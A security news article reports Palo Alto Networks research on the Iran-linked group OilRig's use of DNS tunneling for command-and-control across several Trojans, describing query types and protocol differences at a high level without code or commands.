Iran-linked cyber-espionage group OilRig is making broad use of DNS tunneling across its tools portfolio, Palo Alto Networks security researchers reveal.
Active since at least 2014 and said to have ties with the Iranian government, the hacking group has been mainly targeting the financial, government, energy, telecoms, and chemical sectors in the Middle East.
Over the years, the group has relied on a variety of tools to conduct attacks, but many of their Trojans use DNS tunneling to communicate with the command and control (C&C) server, a clear indicator of this being their preferred communication method.
Analysis of the employed technique revealed that in all cases the subdomains contain a randomly generated value to avoid cached responses; an initial handshake is normally used to obtain a unique system identifier; A, AAAA, and TXT query types are employed (impacting the amount of data the C&C can transmit to the Trojan); and that all protocols generate a significant number of DNS queries.
The researchers also noticed that a hardcoded IP addresses is used to start and stop data transfers, and that sequence numbers are used when uploading data, so that the C&C can reconstruct it in the correct order.
OilRig has been employing DNS tunneling for C&C communication since at least 2016, with some of the group’s Trojans using it being Helminth, ISMAgent, ALMACommunicator, BONDUPDATER, and QUADAGENT.
All of these tools leverage DNS queries to resolve specially crafted subdomains and send data to the C&C, but the protocols differ in many ways, the researchers say. The structure of the subdomains queried, of the data received by the Trojans, and of the subdomains used to transmit data is different.
Moreover, the encoding used to represent the data differs, the same as the manner in which the Trojans issue DNS queries, Palo Alto Networks reveals.
The different variants of Helminth observed over the years (portable and PowerShell) use the same DNS Type A, but the attackers can change the generated subdomains to make them visually different and avoid detection.
Used in various targeted attacks, ISMAgent uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. The Trojan issues a beacon to inform the server it is ready to transmit data, and then sends the data encoded to the C&C.
OilRig was observed using two different variants of the ALMA Communicator as the payload, each employing a different domain structure. Differences between the two also include the information sent to the server and the formatting of the data within the DNS tunneling protocol.
The hacking group has used multiple variants of the BONDUPDATER tool in attacks since at least mid-2017, with the early samples employing DNS A queries using the “GetHostAddresses” method in the System.Net.Dns class, and the later one leveraging the System.Net.Sockets.UdpClient class’ raw sockets for both DNS A and TXT lookups.
The QUADAGENT Trojan uses AAAA queries to transmit and receive data via DNS tunneling, but a different method is used to issue queries depending on the Windows version.
“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices. One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,” Palo Alto Networks concludes.
Related: Iran-Linked Hackers Use Just-in-Time Creation of Weaponized Attack Docs

More from Ionut Arghire
- BIND Updates Patch High-Severity, Remotely Exploitable DoS Flaws
- Microsoft Urges Customers to Patch Exchange Servers
- Iranian APT Leaks Data From Saudi Arabia Government Under New Persona
- 820k Impacted by Data Breach at Zacks Investment Research
- US Government Agencies Warn of Malicious Use of Remote Management Software
- Chinese Hackers Adopting Open Source ‘SparkRAT’ Tool
- CISA Provides Resources for Securing K-12 Education System
- Strata Raises $26 Million for Multi-Cloud Identity Management Platform
Latest News
- BIND Updates Patch High-Severity, Remotely Exploitable DoS Flaws
- Industry Reactions to Hive Ransomware Takedown: Feedback Friday
- Microsoft Urges Customers to Patch Exchange Servers
- Iranian APT Leaks Data From Saudi Arabia Government Under New Persona
- US Reiterates $10 Million Reward Offer After Disruption of Hive Ransomware
- Cyberattacks Target Websites of German Airports, Admin
- US Infiltrates Big Ransomware Gang: ‘We Hacked the Hackers’
- Tenable Launches $25 Million Early-Stage Venture Fund
